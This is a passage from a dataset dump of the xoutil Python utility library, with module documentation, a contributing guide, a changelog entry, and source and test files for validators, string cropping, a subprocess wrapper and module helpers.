`xoutil.memoize`:mod: and `xoutil.opendict`:mod:.\n\n- Fixes bug in `xoutil.datetime.strfdelta`:func:. It used to show things like\n '1h 62min'.\n\n- Introduces `xoutil.compat.class_type`:data: that holds class types for Python\n 2 or Python 3.\n" }, { "alpha_fraction": 0.6747624278068542, "alphanum_fraction": 0.6842660903930664, "avg_line_length": 39.58571243286133, "blob_id": "393bb54b584ba9b26f2fedf547f579a8b0cbd1ca", "content_id": "9c35334304200f2dd15b5339ab17d3b4701de605", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2841, "license_type": "permissive", "max_line_length": 87, "num_lines": 70, "path": "/docs/source/xotl.tools/future/itertools.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.future.itertools`:mod: - Functions creating iterators for efficient looping\n=======================================================================================\n\n.. automodule:: xotl.tools.future.itertools\n :members: dict_update_new, first_n, first_non_null,\n\t slides, continuously_slides, ungroup\n\n.. function:: merge(*iterables, key=None)\n\n Merge the iterables in order.\n\n Return an iterator that yields all items from `iterables` following the\n order given by `key`. If `key` is not given we compare the items.\n\n If the `iterables` yield their items in increasing order (w.r.t `key`), the\n result is also ordered (like a merge sort).\n\n ``merge()`` returns the *empty* iterator.\n\n .. versionadded:: 1.8.4\n\n .. versionchanged:: 2.1.0 Based on `heapq.merge`:func:. In Python\n 3.5+, this is just an alias of it.\n\n .. deprecated:: 2.1.0 Use `heapq.merge`:func: directly. This function will\n be removed when we support for Python 3.4.\n\n.. autofunction:: delete_duplicates(seq[, key=lambda x: x])\n\n.. autofunction:: iter_delete_duplicates(iter[, key=lambda x: x])\n\n.. autofunction:: iter_without_duplicates(iter[, key=lambda x: x])\n\n.. autofunction:: flatten(sequence, is_scalar=xotl.tools.types.is_scalar, depth=None)\n\n.. function:: xotl.tools.iterators.zip([iter1[, iter2[, ...]]])\n\n Return a zip-like object whose `next()` method returns a tuple where the\n i-th element comes from the i-th iterable argument. The `next()` method\n continues until the shortest iterable in the argument sequence is exhausted\n and then it raises StopIteration.\n\n .. deprecated:: 2.1.0 Use the builtin `zip`:func:. This function will be\n removed in xotl.tools 3.\n\n\n.. function:: xotl.tools.iterators.map(func, *iterables)\n\n Make an iterator that computes the function using arguments from each of the\n iterables. It stops when the shortest iterable is exhausted instead of\n filling in None for shorter iterables.\n\n .. deprecated:: 2.1.0 Use the builtin `map`:func:. This function will be\n removed in xotl.tools 3.\n\n.. function:: xotl.tools.iterators.zip_longest(*iterables, fillvalue=None)\n\n Make an iterator that aggregates elements from each of the iterables. If the\n iterables are of uneven length, missing values are filled-in with\n fillvalue. Iteration continues until the longest iterable is\n exhausted.\n\n If one of the iterables is potentially infinite, then the\n `zip_longest`:func: function should be wrapped with something that limits\n the number of calls (for example `islice`:func: or `takewhile`:func:). If\n not specified, `fillvalue` defaults to None.\n\n This function is actually an alias to `itertools.izip_longest`:func: in\n Python 2.7, and an alias to `itertools.zip_longest`:func: in Python\n 3.3.\n" }, { "alpha_fraction": 0.7187633514404297, "alphanum_fraction": 0.7238805890083313, "avg_line_length": 32.5, "blob_id": "6d19460b1dac298b6b0e650cd282e2960e1117ad", "content_id": "dfcab3d558f21a4b80774f0578d269d365eb3342", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 4691, "license_type": "permissive", "max_line_length": 90, "num_lines": 140, "path": "/docs/source/CONTRIBUTING.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "=====================================\n How to contribute to ``xotl.tools``\n=====================================\n\nTesting\n=======\n\nRunning tests\n-------------\n\nQuick::\n\n pipenv install --dev\n tox\n\n\nWriting tests\n-------------\n\nTesting was not introduced in ``xotl.tools`` until late in the project life.\nSo there are many modules that lack a proper test suite.\n\nTo ease the task of writing tests, we chose `pytest`.\n\nWe use both normal tests (\"à la pytest\") and doctest. The purpose of doctests\nis testing the documentation instead of testing the code, which is the purpose\nof the former.\n\nMost of our normal tests are currently simple functions with the \"test\" prefix\nand are located in the ``tests/`` directory.\n\nMany functions that lacks are, though, tested by our use in other projects.\nHowever, it won't hurt if we write them.\n\n\nDocumentation\n=============\n\nSince ``xotl.tools`` is collection of very disparate stuff, the documentation\nis hardly narrative but is contained in the docstrings of every \"exported\"\nelement, except perhaps for module-level documentation in some cases. In\nthese later cases, a more narrative text is placed in the ``.rst`` file that\ndocuments the module.\n\n\nVersioning and deprecation\n==========================\n\n`xoutil` uses three version components.\n\nThe first number refers to language compatibility: `xoutil` 1.x series are\ndevoted to keeping compatible versions of the code for both Python 2.7 and\nPython 3.2+. The jump to 2.x version series will made when `xoutil` won't\nsupport Python 2.7 any longer.\n\nFrom version 2.1.0, we renamed the package to ``xotl.tools`` but we keep\nimports up to version 3.0, and distribution of ``xoutil`` up to version 2.2.0.\n\nThe second number is library major version indicator. This indicates, that\nsome deprecated stuff are finally removed and/or new functionality is\nprovided.\n\nThe third number is minor release number. Devoted to indicate mostly fixes to\nexisting functionality. Though many times, some functions are merged and the\nold ones get a deprecation warning.\n\nOccasionally, a fourth component is added to a release. This usually means a\npackaging problem, or bug in the documentation.\n\n\nModule layout and rules\n=======================\n\nMany modules in ``xotl.tools`` contains definitions used in ``xotl.tools`` itself. Though\nwe try to logically place every feature into a rightful, logical module;\nsometimes this is not possible because it would lead to import dependency\ncycles.\n\nWe are establishing several rules to keep our module layout and dependency\nquite stable while, at the same time, allowing developers to use almost every\nfeature in xoutil.\n\nWe divide xoutil modules into 4 tiers:\n\n#. Tier 0\n\n This tier groups the modules that **must not** depend from other modules\n besides the standard library. These modules implement some features that\n are exported through other xoutil modules. These module are never\n documented, but their re-exported features are documented elsewhere.\n\n#. Tier 1\n\n In this tier we have:\n\n - `xotl.tools.decorator.meta`:mod:. This is to allow the definition of\n decorators in other modules.\n\n - ``xotl.tools.names`:mod:. This is to allow the use of\n `xotl.tools.names.namelist`:class: for the ``__all__`` attribute of other\n modules.\n\n - `xotl.tools.deprecation`:mod:. It **must not** depend on any other\n module. Many modules in ``xotl.tools`` will use this module at import\n time to declare deprecated features.\n\n#. Tier 2\n\n Modules in this tier should depend only on features defined in tiers 0 and 1\n modules, and that export features that could be imported at the module\n level.\n\n This tier only has the `xotl.tools.modules`:mod:. Both\n `xotl.tools.modules.modulepropery`:func: and\n `xotl.tools.modules.modulemethod`:func: are meant be used at module level\n definitions, so they are likely to be imported at module level.\n\n#. Tier 3\n\n The rest of the modules.\n\n In this tier, `xotl.tools.objects`:mod: is king. But in order to allow the\n import of other modules the following pair of rules are placed:\n\n - At the module level only import from upper tiers.\n\n - Imports from tier 3 are allowed, but only inside the functions that use\n them.\n\n This entails that you can't define a function that must be a module level\n import, like a decorator for other functions. For that reason, decorators\n are mostly placed in the `xotl.tools.decorator`:mod: module.\n\n\nThe tiers above are a \"logical suggestion\" of how xoutil modules are organized\nand indicated how they might evolve.\n\n\n.. [#py-for-tests] See definitive list of needed Python interpreters in\n ``tox.ini`` file.\n" }, { "alpha_fraction": 0.6276595592498779, "alphanum_fraction": 0.6369102597236633, "avg_line_length": 32.78125, "blob_id": "4cc9474f3d210dcef0455b8dfc63866421b65564", "content_id": "c98e1ed92086e9e21adad7c4366153756206bbee", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2164, "license_type": "permissive", "max_line_length": 83, "num_lines": 64, "path": "/docs/source/xotl.tools/future/types.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.future.types`:mod: - Names for built-in types and extensions\n========================================================================\n\n.. module:: xotl.tools.future.types\n\nThis module extends the standard library's `functools`:mod:. You may use it\nas a drop-in replacement in many cases.\n\nAvoid importing ``*`` from this module since could be different in Python 2.7\nand Python 3.3.\n\nWe added mainly compatibility type definitions, those that each one could be in one\nversion and not in other.\n\n.. autofunction:: new_class\n\n .. versionadded:: 1.5.5\n\n.. autofunction:: prepare_class\n\n .. versionadded:: 1.5.5\n\n.. class:: MappingProxyType\n\n .. versionadded:: 1.5.5\n\n Read-only proxy of a mapping. It provides a dynamic view on the mapping’s\n entries, which means that when the mapping changes, the view reflects these\n changes.\n\n .. note:: In Python 3.3+ this is an alias for\n `types.MappingProxyType`:class: in the standard library.\n\n.. class:: SimpleNamespace\n\n .. versionadded:: 1.5.5\n\n A simple `object`:class: subclass that provides attribute access to its\n namespace, as well as a meaningful repr.\n\n Unlike `object`:class:, with ``SimpleNamespace`` you can add and remove\n attributes. If a ``SimpleNamespace`` object is initialized with keyword\n arguments, those are directly added to the underlying namespace.\n\n The type is roughly equivalent to the following code::\n\n class SimpleNamespace(object):\n def __init__(self, **kwargs):\n self.__dict__.update(kwargs)\n def __repr__(self):\n keys = sorted(self.__dict__)\n items = (\"{}={!r}\".format(k, self.__dict__[k]) for k in keys)\n return \"{}({})\".format(type(self).__name__, \", \".join(items))\n def __eq__(self, other):\n return self.__dict__ == other.__dict__\n\n ``SimpleNamespace`` may be useful as a replacement for ``class NS: pass``.\n However, for a structured record type use `~collections.namedtuple`:func:\n instead.\n\n .. note:: In Python 3.4+ this is an alias to\n `types.SimpleNamespace`:class:.\n\n.. autoclass:: DynamicClassAttribute\n" }, { "alpha_fraction": 0.6817666888237, "alphanum_fraction": 0.6902604699134827, "avg_line_length": 32.00934600830078, "blob_id": "cf173251b8fbfb328adab7e593101d46eba96e2a", "content_id": "73653fac41b7eca7c17a090246185568579f350c", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 3532, "license_type": "permissive", "max_line_length": 79, "num_lines": 107, "path": "/docs/source/xotl.tools/future/collections.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "``xotl.tools.future.collections`` - High-performance container datatypes\n========================================================================\n\n.. module:: xotl.tools.future.collections\n\nThis module extends the standard library's `collections`:mod:. You may use it\nas a drop-in replacement in many cases.\n\nAvoid importing ``*`` from this module since this is different in Python 2.7\nand Python 3.3. Notably importing ``abc`` is not available in Python 2.7.\n\nWe have backported several Python 3.3 features but not all.\n\n\n.. autoclass:: defaultdict\n\n.. autoclass:: opendict\n :members: from_enum\n\n.. autoclass:: codedict\n\n.. autoclass:: Counter\n\n .. note:: Backported from Python 3.3. In Python 3.3 this is an alias.\n\n.. autoclass:: OrderedDict\n\n .. note:: Backported from Python 3.3. In Python 3.3 this is an alias.\n\n.. autoclass:: OpenDictMixin\n\n.. autoclass:: OrderedSmartDict\n\n.. autoclass:: SmartDictMixin\n\n.. autoclass:: StackedDict\n :members: push_level, pop_level, level, peek\n\n .. method:: pop()\n\n A deprecated alias for `pop_level`:meth:.\n\n .. deprecated:: 1.7.0\n\n .. method:: push(*args, **kwargs)\n\n A deprecated alias for `push_level`:meth:.\n\n .. deprecated:: 1.7.0\n\n\n.. class:: ChainMap(*maps)\n\n A ChainMap groups multiple dicts or other mappings together to create a\n single, updateable view. If no maps are specified, a single empty\n dictionary is provided so that a new chain always has at least one mapping.\n\n The underlying mappings are stored in a list. That list is public and can\n accessed or updated using the maps attribute. There is no other state.\n\n Lookups search the underlying mappings successively until a key is found.\n In contrast, writes, updates, and deletions only operate on the first\n mapping.\n\n A ChainMap incorporates the underlying mappings by reference. So, if one of\n the underlying mappings gets updated, those changes will be reflected in\n ChainMap.\n\n All of the usual dictionary methods are supported. In addition, there is a\n maps attribute, a method for creating new subcontexts, and a property for\n accessing all but the first mapping:\n\n .. attribute:: maps\n\n A user updateable list of mappings. The list is ordered from\n first-searched to last-searched. It is the only stored state and can be\n modified to change which mappings are searched. The list should always\n contain at least one mapping.\n\n .. method:: new_child(m=None)\n\n Returns a new `ChainMap`:class: containing a new map followed by all of\n the maps in the current instance. If ``m`` is specified, it becomes the\n new map at the front of the list of mappings; if not specified, an empty\n dict is used, so that a call to ``d.new_child()`` is equivalent to:\n ``ChainMap({}, *d.maps)``. This method is used for creating subcontexts\n that can be updated without altering values in any of the parent\n mappings.\n\n .. versionchanged:: 1.5.5\n\t The optional ``m`` parameter was added.\n\n .. attribute:: parents\n\n Property returning a new ChainMap containing all of the maps in the\n current instance except the first one. This is useful for skipping the\n first map in the search. Use cases are similar to those for the\n nonlocal keyword used in nested scopes. A reference to ``d.parents`` is\n equivalent to: ``ChainMap(*d.maps[1:])``.\n\n\n .. note:: Backported from Python 3.4. In Python 3.4 this is an alias.\n\n\n.. autoclass:: PascalSet\n\n.. autoclass:: BitPascalSet\n" }, { "alpha_fraction": 0.6245919466018677, "alphanum_fraction": 0.6251360177993774, "avg_line_length": 23.1842098236084, "blob_id": "eb4a49bcbf743d8837669e52f70398e86f1d72ca", "content_id": "fbd1d94b8f07d56cad6a503ea7435af0a21874cf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1839, "license_type": "no_license", "max_line_length": 73, "num_lines": 76, "path": "/xotl/tools/validators/identifiers.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"\nRegular expressions and validation functions for several identifiers.\n\"\"\"\n\nfrom re import compile as _regex_compile\n\n\n__all__ = (\n \"is_valid_identifier\",\n \"is_valid_full_identifier\",\n \"is_valid_public_identifier\",\n \"is_valid_slug\",\n)\n\n\ndef is_valid_identifier(name):\n \"\"\"Returns True if `name` a valid Python identifier.\n\n If `name` is not a string, return False. This is roughly::\n\n isinstance(name, str) and name.isidentifier()\n\n \"\"\"\n return isinstance(name, str) and name.isidentifier()\n\n\ndef check_identifier(name):\n \"\"\"Checks if `name` a valid Python identifier.\n\n If not, an exception is raised.\n\n \"\"\"\n if is_valid_identifier(name):\n return name\n else:\n raise ValueError('\"%s\" is not a valid identifier!' % name)\n\n\ndef is_valid_full_identifier(name):\n \"\"\"Returns True if `name` is a valid dotted Python identifier.\n\n See `is_valid_identifier`:func: for what \"validity\" means.\n\n \"\"\"\n if isinstance(name, str):\n return all(part.isidentifier() for part in name.split(\".\"))\n else:\n return False\n\n\ndef is_valid_public_identifier(name):\n \"\"\"Returns True if `name` is a valid Python identifier that is deemed\n public.\n\n Convention says that any name starting with a \"_\" is not public.\n\n See `is_valid_identifier`:func: for what \"validity\" means.\n\n \"\"\"\n return is_valid_identifier(name) and not name.startswith(\"_\")\n\n\n_SLUG_REGEX = _regex_compile(r\"(?i)^[\\w]+([-][\\w]+)*$\")\n\n\ndef is_valid_slug(slug):\n return isinstance(slug, str) and _SLUG_REGEX.match(slug)\n" }, { "alpha_fraction": 0.6377708911895752, "alphanum_fraction": 0.7492260336875916, "avg_line_length": 45.14285659790039, "blob_id": "bf3e581217597a6ed0728023e7ee21313dba6b48", "content_id": "3b207e8333966194d890b73f43484327acd5142e", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 324, "license_type": "permissive", "max_line_length": 101, "num_lines": 7, "path": "/docs/source/history/_changes-1.7.2.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Add `xoutil.bound.until`:func: and `xoutil.bound.until_errors`:func:.\n\n- Fix issue that made `xoutil.uuid`:mod: unusable. Introduced in\n version 1.7.1, commit `58eb359\n <https://github.com/merchise-autrement/xoutil/commit/58eb35950cc33a9ecaa6565895e1b2147cace9f9_>`__.\n\n- Remove support for Python 3.1 and Python 3.2.\n" }, { "alpha_fraction": 0.604234516620636, "alphanum_fraction": 0.6091205477714539, "avg_line_length": 25.69565200805664, "blob_id": "0e2ab2b35e754e042650ee73b05faf73f68d3c95", "content_id": "a2d0449bf7ccaf0f0a0dfda15fc02d85fa42cd7e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3685, "license_type": "no_license", "max_line_length": 72, "num_lines": 138, "path": "/tests/test_modules.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nimport sys\nimport unittest\n\nfrom xoutil.modules import customize, modulemethod\n\n\nclass TestModulesCustomization(unittest.TestCase):\n def setUp(self):\n import testbed\n\n self.testbed = testbed\n\n def tearDown(self):\n sys.modules[self.testbed.__name__] = self.testbed\n\n def test_echo(self):\n import testbed\n\n module, created, klass = customize(testbed)\n self.assertEqual(10, module.echo(10))\n\n def test_module_props(self):\n @property\n def this(mod):\n return mod\n\n import testbed\n\n attrs = {\"this\": this}\n module, created, klass = customize(testbed, custom_attrs=attrs)\n self.assertEqual(module, module.this)\n\n\nclass TestModuleDecorators(unittest.TestCase):\n def test_echo_module_level(self):\n import sys\n\n @modulemethod\n def echo(self, *args):\n return (self, args)\n\n current_module = sys.modules[__name__]\n self.assertEqual((current_module, (1, 2)), echo(1, 2))\n\n def test_moduleproperties(self):\n import customizetestbed as m\n\n self.assertIs(m, m.this)\n self.assertIs(None, m.store)\n self.assertIsNone(m.prop)\n m.store = (1, 2)\n m.prop = \"prop\"\n self.assertEqual((1, 2), m.store)\n self.assertEqual((1, 2), m._store)\n self.assertIs(\"prop\", m.prop)\n\n with self.assertRaises(AttributeError):\n m.this = 1\n\n del m.store\n with self.assertRaises(AttributeError):\n m._store == ()\n self.assertIs(None, m.store)\n\n del m.prop\n with self.assertRaises(AttributeError):\n m._prop == \"prop\"\n self.assertIsNone(m.prop)\n\n def test_module_level_memoized_props(self):\n import customizetestbed as m\n from xoutil.future.inspect import getattr_static\n\n self.assertNotEquals(getattr_static(m, \"memoized\"), m)\n self.assertIs(m.memoized, m)\n self.assertIs(getattr_static(m, \"memoized\"), m)\n\n\ndef test_get_module_path_by_module_object():\n import xotl.tools\n import xotl.tools.future.itertools\n from os.path import join\n from xotl.tools.modules import get_module_path\n\n top = xotl.tools.__path__[0]\n expected = top\n assert get_module_path(xotl.tools) == expected\n\n expected = (\n join(top, \"future\", \"itertools.py\"),\n join(top, \"future\", \"itertools.pyc\"),\n join(top, \"future\", \"itertools.pyo\"),\n )\n assert get_module_path(xotl.tools.future.itertools) in expected\n\n\ndef test_get_module_path_by_module_string_abs():\n import xotl.tools\n from os.path import join\n from xotl.tools.modules import get_module_path\n\n top = xotl.tools.__path__[0]\n expected = top\n assert get_module_path(\"xotl.tools\") == expected\n expected = (\n join(top, \"future\", \"itertools.py\"),\n join(top, \"future\", \"itertools.pyc\"),\n join(top, \"future\", \"itertools.pyo\"),\n )\n assert get_module_path(\"xotl.tools.future.itertools\") in expected\n\n\ndef test_get_module_path_by_module_string_rel():\n import pytest\n from xoutil.modules import get_module_path\n\n with pytest.raises(TypeError):\n assert get_module_path(\".iterators\")\n\n\ndef test_object_stability():\n import testbed\n from testbed import selfish\n\n a, b = testbed.selfish()\n c, d = selfish()\n e, f = testbed.selfish()\n assert a == c == e\n assert b == d == f\n" }, { "alpha_fraction": 0.554616391658783, "alphanum_fraction": 0.5570546388626099, "avg_line_length": 32.25405502319336, "blob_id": "1e29fdba001922f50278fd6018b0a7e122ece964", "content_id": "3c669eda79be5fb6c5bf2c863cc222993ac4e45b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6157, "license_type": "no_license", "max_line_length": 87, "num_lines": 185, "path": "/xotl/tools/clipping.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ----------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Complements for object string representation protocol.\n\nThere are contexts that using ``str`` or ``repr`` protocol would be inadequate\nbecause shorter string representations are expected (e.g. formatting recursive\nobjects in `pprint`:mod: standard module that they have a new Boolean\nparameter in Python 3 named ``compact``).\n\nThere is a protocol to complement operators used by standard string\nrepresentation functions (``__str__``, ``__repr__``) by defining a new one\nwith name ``__crop__``. This operator will receive some extra parameters with\ndefault values, see `crop`:func: function for details.\n\n\"\"\"\n\n\n#: Value for `max_width` parameter in functions that shorten strings, must not\n#: be less than this value.\nMIN_WIDTH = 8\n\n#: Default value for `max_width` parameter in functions that shorten strings,\n#: see `crop`:func:.\nDEFAULT_MAX_WIDTH = 64\n\nELLIPSIS_ASCII = \"...\"\nELLIPSIS_UNICODE = \"…\"\n\n#: Value used as a fill when a string representation overflows.\nELLIPSIS = ELLIPSIS_UNICODE\n\n#: Operator name allowing objects to define theirs own method for string\n#: shortening.\nOPERATOR_NAME = \"__crop__\"\n\n_LAMBDA_NAME = (lambda: 0).__name__\n\n\ndef _check_max_width(max_width, caller=None):\n \"\"\"Type constrain for \"max_width\" parameter.\"\"\"\n if max_width is None:\n max_width = DEFAULT_MAX_WIDTH\n elif max_width < MIN_WIDTH:\n msg = \"{}() \".format(caller) if caller else \"\"\n msg += (\n \"invalid value for `max_width`, must be between greated than \" \"{}; got {}\"\n ).format(MIN_WIDTH, max_width)\n raise ValueError(msg)\n return max_width\n\n\ndef crop(obj, max_width=None, canonical=False):\n \"\"\"Return a reduced string representation of `obj`.\n\n Classes can now define a new special attribute ``__crop__``. It\n can be a `string <str>`:class: (or `unicode`:class: in Python 2). Or a\n method::\n\n def __crop__(self, max_width=None, canonical=False):\n pass\n\n If the `obj` does not implement the ``__crop__`` protocol, a standard one\n is computed.\n\n :param max_width: Maximum length for the resulting string. If is not\n given, defaults to `DEFAULT_MAX_WIDTH`:obj:.\n\n :param canonical: If True `repr`:func: protocol must be used instead\n `str`:func: (the default).\n\n .. versionadded:: 1.8.0\n\n \"\"\"\n from functools import partial\n\n max_width = _check_max_width(max_width, caller=\"crop\")\n if isinstance(obj, str):\n res = obj # TODO: reduce\n else:\n oper = getattr(obj, OPERATOR_NAME, partial(_crop, obj))\n if isinstance(oper, str):\n # XXX: Allowing to define expecting operator as a static resulting\n # string\n res = oper\n elif callable(oper):\n # XXX: I don't remember anymore why this check is needed\n if getattr(oper, \"__self__\", \"OK\") is not None:\n try:\n res = oper(max_width=max_width, canonical=canonical)\n except TypeError:\n # Just preventing operator definition with no extra\n # parameters\n res = oper()\n else:\n res = NotImplemented\n else:\n msg = \"crop() invalid '{}' type: {}\"\n raise TypeError(msg.format(OPERATOR_NAME, type(oper).__name__))\n return res\n\n\ndef _crop(obj, max_width=None, canonical=False):\n \"\"\"Internal crop tool.\"\"\"\n from collections import Set, Mapping\n\n res = repr(obj) if canonical else str(obj)\n if (res.startswith(\"<\") and res.endswith(\">\")) or len(res) > max_width:\n try:\n res = obj.__name__\n if res == _LAMBDA_NAME and not canonical:\n # Just a gift\n res = res.replace(_LAMBDA_NAME, \"λ\")\n except AttributeError:\n if isinstance(obj, (tuple, list, Set, Mapping)):\n res = crop_iterator(obj, max_width, canonical)\n else:\n res = \"{}({})\".format(type(obj).__name__, ELLIPSIS)\n return res\n\n\ndef crop_iterator(obj, max_width=None, canonical=False):\n \"\"\"Return a reduced string representation of the iterator `obj`.\n\n See `crop`:func: function for a more general tool.\n\n If `max_width` is not given, defaults to ``DEFAULT_MAX_WIDTH``.\n\n .. versionadded:: 1.8.0\n\n \"\"\"\n from collections import Set, Mapping\n\n max_width = _check_max_width(max_width, caller=\"crop_iterator\")\n classes = (tuple, list, Mapping, Set)\n cls = next((c for c in classes if isinstance(obj, c)), None)\n if cls:\n res = \"\"\n if cls is Set and not obj:\n borders = (\"{}(\".format(type(obj).__name__), \")\")\n else:\n borders = (\"()\", \"[]\", \"{}\", \"{}\")[classes.index(cls)]\n UNDEF = object()\n sep = \", \"\n if cls is Mapping:\n iteritems = lambda d: iter(d.items())\n\n def itemrepr(item):\n key, value = item\n return \"{}: {}\".format(repr(key), repr(value))\n\n else:\n iteritems = iter\n itemrepr = repr\n items = iteritems(obj)\n ok = True\n while ok:\n item = next(items, UNDEF)\n if item is not UNDEF:\n if res:\n res += sep\n aux = itemrepr(item)\n if len(res) + len(borders) + len(aux) <= max_width:\n res += aux\n else:\n res += ELLIPSIS\n ok = False\n else:\n ok = False\n return \"{}{}{}\".format(borders[0], res, borders[1])\n else:\n raise TypeError(\n \"crop_iterator() expects tuple, list, set, or \"\n \"mapping; got {}\".format(type(obj).__name__)\n )\n\n\n# aliases\nshort = small = crop # noqa\n" }, { "alpha_fraction": 0.5772425532341003, "alphanum_fraction": 0.579734206199646, "avg_line_length": 29.100000381469727, "blob_id": "f0c6d1a675e1dfb7b068d6b962559bdfcf6c011c", "content_id": "19147b279734bbbd89de3ec31911a2cc99441173", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2409, "license_type": "no_license", "max_line_length": 88, "num_lines": 80, "path": "/tests/test_symbols.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\nimport unittest\nfrom xoutil.symbols import boolean\n\n\nclass BooleanTests(unittest.TestCase):\n def test_singletons(self):\n from sys import intern\n from xoutil.symbols import Unset\n\n foo = \"Un\"\n bar = \"set\"\n a = boolean(\"Unset\")\n b = boolean(foo + \"set\")\n c = boolean(\"Un\" + bar)\n\n # self.assertIs(intern(foo + bar), repr(Unset))\n # above started to fail in PyPy, changed to next.\n self.assertIs(intern(foo + bar), intern(repr(Unset)))\n self.assertIs(repr(a), repr(b))\n self.assertIs(a, Unset)\n self.assertIs(b, Unset)\n self.assertIs(c, Unset)\n\n def test_equality(self):\n a = boolean(\"false\")\n b = boolean(\"true\", True)\n self.assertEqual(a, False)\n self.assertEqual(b, True)\n self.assertEqual(not b, False)\n\n def test_parse(self):\n a = boolean(\"false\")\n b = boolean(\"true\", True)\n c = boolean.parse(repr(a))\n self.assertIs(boolean.parse(\"false\"), a)\n self.assertIs(boolean.parse(\"true\"), b)\n self.assertIs(a, c)\n\n def test_int_compatibility(self):\n a = boolean(\"false\")\n b = boolean(\"true\", True)\n self.assertEqual(a + 1, 1)\n self.assertEqual(b + 1, 2)\n\n def test_comments(self):\n a = boolean(\"false\")\n value = \"%s # This is a comment\" % a\n b = boolean.parse(value)\n self.assertIs(a, b)\n\n def test_symbols_are_pickable(self):\n import pickle\n from xotl.tools.symbols import Unset, Undefined\n\n for protocol in range(pickle.DEFAULT_PROTOCOL, pickle.HIGHEST_PROTOCOL + 1):\n self.assertIs(Unset, pickle.loads(pickle.dumps(Unset, protocol)))\n self.assertIs(Undefined, pickle.loads(pickle.dumps(Undefined, protocol)))\n\n\ndef test_symbols_is_importable():\n import sys\n\n modules = {mod: sys.modules[mod] for mod in sys.modules if mod.startswith(\"xoutil\")}\n for mod in modules:\n sys.modules.pop(mod)\n try:\n import xoutil.symbols # noqa\n finally:\n for modname, mod in modules.items():\n sys.modules[modname] = mod\n" }, { "alpha_fraction": 0.6013363003730774, "alphanum_fraction": 0.602449893951416, "avg_line_length": 29.965517044067383, "blob_id": "642ccc5d47c4d1391c5b4f61e8ca9d3c1f52062e", "content_id": "d1905dec982d09f8bc1fe8f99494066eb94c808d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 899, "license_type": "no_license", "max_line_length": 79, "num_lines": 29, "path": "/xotl/tools/future/subprocess.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Extensions the `subprocess` module in the standard library.\"\"\"\n\n\nfrom subprocess import * # noqa\nfrom subprocess import __all__, Popen, PIPE # noqa\n\n__all__ = list(__all__) + [\"call_and_check_output\"]\n\n\ndef call_and_check_output(*popenargs, **kwargs):\n \"\"\"Combines `call` and `check_output`. Returns a tuple ``(returncode,\n output, err_output)``.\n\n \"\"\"\n if \"stdout\" in kwargs:\n raise ValueError(\"stdout argument not allowed, it will be overridden.\")\n process = Popen(stdout=PIPE, *popenargs, **kwargs)\n output, err = process.communicate()\n retcode = process.poll()\n return (retcode, output, err)\n" }, { "alpha_fraction": 0.5681588649749756, "alphanum_fraction": 0.5725345015525818, "avg_line_length": 32.382022857666016, "blob_id": "118ae999f905e6435be31f5a4a505551a022c164", "content_id": "b18619cecadeda0bcd7fd0f811b5379f35efe810", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2972, "license_type": "no_license", "max_line_length": 77, "num_lines": 89, "path": "/tests/test_fs.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Tests for xoutil.fs module\"\"\"\n\nimport os\nimport unittest\nimport tempfile\nimport shutil\n\n# Makes sure our package is always importable\n# 